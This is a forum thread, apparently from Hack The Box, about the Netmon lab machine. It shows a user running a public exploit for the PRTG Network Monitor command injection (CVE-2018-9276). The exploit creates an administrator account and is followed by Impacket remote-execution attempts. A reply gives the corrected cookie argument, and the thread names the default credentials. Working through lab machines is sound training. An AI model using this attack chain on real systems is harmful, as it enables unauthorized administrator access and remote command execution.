NETMON PRTG Network monitor RCE Exploit along with psexec.py issue

HTB Content Machines
1

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo ./new.sh -u http://10.10.10.152 -c " _ga=GA1.4.559325993.1627923139; _gid=GA1.4.89938601.1627923139; OCTOPUS1813713946=e0Y4OEYwQjMzLTI3QTctNEYyOC05QUE5LTYxNENFRjhFMDlBQX0%3D"

[+]#########################################################################[+]
[] Authenticated PRTG network Monitor remote code execution []
[+]#########################################################################[+]
[] Date: 11/03/2019 []
[+]#########################################################################[+]
[] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com []
[+]#########################################################################[+]
[] Vendor Homepage: Discover the 3 Paessler PRTG monitoring solutions []
[] Version: 18.2.38 []
[] CVE: CVE-2018-9276 []
[] Reference: PRTG < 18.2.39 Command Injection Vulnerability – CodeWatch []
[+]#########################################################################[+]

login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.

run the script to create a new user ‘pentest’ in the administrators group with password ‘P3nT3st!’

[+]#########################################################################[+]

[] file created
[] sending notification wait…

[] adding a new user ‘pentest’ with password ‘P3nT3st’
[] sending notification wait…

[] adding a user pentest to the administrators group
[] sending notification wait…

[*] exploit completed new user ‘pentest’ with password ‘P3nT3st!’ created have fun!

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo psexec.py pentest:‘P3nT3st!’@10.10.10.152
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo wmiexec.py pentest:‘P3nT3st!’@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo psexec.py pentest:‘P3nT3st’@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo wmiexec.py pentest:‘P3nT3st!’@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo smbexec.py pentest:‘P3nT3st!’@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

so as you can read, it seems to be an authentication issue but the creds from the exploit do not seem to be working

please help

1 Like
2

I figured out the issue. The issue is what I put for the exploit lay out. for the exploit all you need is the OCTOPUS cookie itself

WRONG: sudo ./new.sh -u http://10.10.10.152 -c " _ga=GA1.4.559325993.1627923139; _gid=GA1.4.89938601.1627923139; OCTOPUS1813713946=e0Y4OEYwQjMzLTI3QTctNEYyOC05QUE5LTYxNENFRjhFMDlBQX0%3D"

sudo ./new.sh -u http://10.10.10.152 -c “e0Q5NjIyRkFGLUJCNjMtNEVGOS04MTQ4LUVDRDc4NEYwQ0E1M30%3D”